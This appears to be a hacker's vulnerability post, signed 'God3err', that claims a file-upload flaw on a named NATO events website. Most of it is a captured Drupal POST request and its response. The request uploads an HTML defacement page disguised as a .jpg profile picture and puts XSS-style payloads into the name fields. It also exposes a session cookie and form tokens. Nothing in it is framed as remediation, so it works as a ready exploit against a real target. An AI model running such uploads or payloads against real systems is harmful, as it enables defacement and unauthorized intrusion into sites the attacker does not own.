NATO Upload Vulnerability
----------------------------------------------------------------
Site: https://events.jftc.nato.int
----------------------------------------------------------------
Videos : https://www.youtube.com/watch?v=sxfdmc-FE5M
----------------------------------------------------------------
Vulnerable POST Code :
----------------------------------------------------------------
17:28:39.016
[4438ms]
[total 4438ms]
Status: 200[OK]
POST https://events.jftc.nato.int/user/26426/userdata?element_parents=userdata/user_picture&ajax_form=1&_wrapper_format=drupal_ajax&_wrapper_format=drupal_ajax
Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE ]
Content Size[-1]
Mime Type[application/json]
Request Headers:
Host[events.jftc.nato.int]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.7.2]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate, br]
X-Requested-With[XMLHttpRequest]
Referer[https://events.jftc.nato.int/user/26426/userdata]
Content-Length[7132]
Content-Type[multipart/form-data; boundary=---------------------------23222661824199]
Cookie[SSESS15be87fcc393b12e70eb4c4f98ed97bc=yV8zL34h9yB25fKnjwRcU6TDMwW6JnpCKenpm1T6ghA]
Connection[keep-alive]
Post Data:
POST_DATA[-----------------------------23222661824199
Content-Disposition: form-data; name="name"
-----------------------------23222661824199
Content-Disposition: form-data; name="first_name"
">ALERT(0);
-----------------------------23222661824199
Content-Disposition: form-data; name="surname"
">ALERT(0);
-----------------------------23222661824199
Content-Disposition: form-data; name="gender"
F
-----------------------------23222661824199
Content-Disposition: form-data; name="nato_rank_title"
OR3
-----------------------------23222661824199
Content-Disposition: form-data; name="national_title"
TUR
-----------------------------23222661824199
Content-Disposition: form-data; name="service"
ARMY
-----------------------------23222661824199
Content-Disposition: form-data; name="nationality"
Turkey (TUR)
-----------------------------23222661824199
Content-Disposition: form-data; name="id_number"
1213123123123
-----------------------------23222661824199
Content-Disposition: form-data; name="nato_security_clearance"
NATO Secret
-----------------------------23222661824199
Content-Disposition: form-data; name="organization[select]"
1 GNC
-----------------------------23222661824199
Content-Disposition: form-data; name="organization[other]"
-----------------------------23222661824199
Content-Disposition: form-data; name="contact_phone"
05********
-----------------------------23222661824199
Content-Disposition: form-data; name="ns_wan_address"
safasfasf
-----------------------------23222661824199
Content-Disposition: form-data; name="files[user_picture]"; filename="index.jpg"
Content-Type: image/jpeg
<html><h1>Hacked By God3err<h1></html>
-----------------------------23222661824199
Content-Disposition: form-data; name="user_picture[fids]"
-----------------------------23222661824199
Content-Disposition: form-data; name="security_clearance_fid[fids]"
6741
-----------------------------23222661824199
Content-Disposition: form-data; name="height"
168
-----------------------------23222661824199
Content-Disposition: form-data; name="eye_color"
Blue
-----------------------------23222661824199
Content-Disposition: form-data; name="marital_status"
married
-----------------------------23222661824199
Content-Disposition: form-data; name="birth_date"
1974-05-06
-----------------------------23222661824199
Content-Disposition: form-data; name="birth_town"
burdur
-----------------------------23222661824199
Content-Disposition: form-data; name="birth_country"
Afghanistan (AFG)
-----------------------------23222661824199
Content-Disposition: form-data; name="form_build_id"
form-vx5EXbx7djtg3TbaVszCcjOGLwqKe4DIHifWokHwsbY
-----------------------------23222661824199
Content-Disposition: form-data; name="form_token"
AsFqzDYst8b5UPULTTcOzKKSHtro8GetqNghSR9N-y8
-----------------------------23222661824199
Content-Disposition: form-data; name="form_id"
simple_form
-----------------------------23222661824199
Content-Disposition: form-data; name="_triggering_element_name"
user_picture_upload_button
-----------------------------23222661824199
Content-Disposition: form-data; name="_triggering_element_value"
Upload
-----------------------------23222661824199
Content-Disposition: form-data; name="_drupal_ajax"
1
-----------------------------23222661824199
Content-Disposition: form-data; name="ajax_page_state[theme]"
bstheme
-----------------------------23222661824199
Content-Disposition: form-data; name="ajax_page_state[theme_token]"
-----------------------------23222661824199
Content-Disposition: form-data; name="ajax_page_state[libraries]"
autologout/drupal.autologout,bootstrap/popover,bootstrap/tooltip,bstheme/bootstrap-scripts,bstheme/global-styling,core/drupal.active-link,core/drupal.date,core/drupal.states,core/html5shiv,core/jquery.form,core/jquery.form,d_filtertable/filtertable,d_signup/signup_registrant_info_sticky,d_signup/signup_select_row,file/drupal.file,file/drupal.file,hide_submit/hide_submit,system/base
-----------------------------23222661824199--
]
Response Headers:
Server[nginx]
Date[Tue, 08 May 2018 14:28:43 GMT]
Content-Type[application/json]
Cache-Control[must-revalidate, no-cache, private]
x-ua-compatible[IE=edge]
Content-Language[en]
X-Content-Type-Options[nosniff]
X-Frame-Options[SAMEORIGIN]
Expires[Sun, 19 Nov 1978 05:00:00 GMT]
Vary[Accept-Encoding]
x-generator[Drupal 8 (https://www.drupal.org)]
x-drupal-ajax-token[1]
Content-Encoding[gzip]
x-request-id[v-1bf98b42-52cc-11e8-903d-22000a271e78]
x-ah-environment[prod]
x-varnish[713984183]
Age[0]
via[1.1 varnish-v4]
X-Cache[MISS]
Accept-Ranges[bytes]
X-Firefox-Spdy[h2]
------------------------------------------------------------------------
//God3err - Thanks For Reading
------------------------------------------------------------------------
Twitter : @KizilKullanici
------------------------------------------------------------------------
☭ God3err ☭
------------------------------------------------------------------------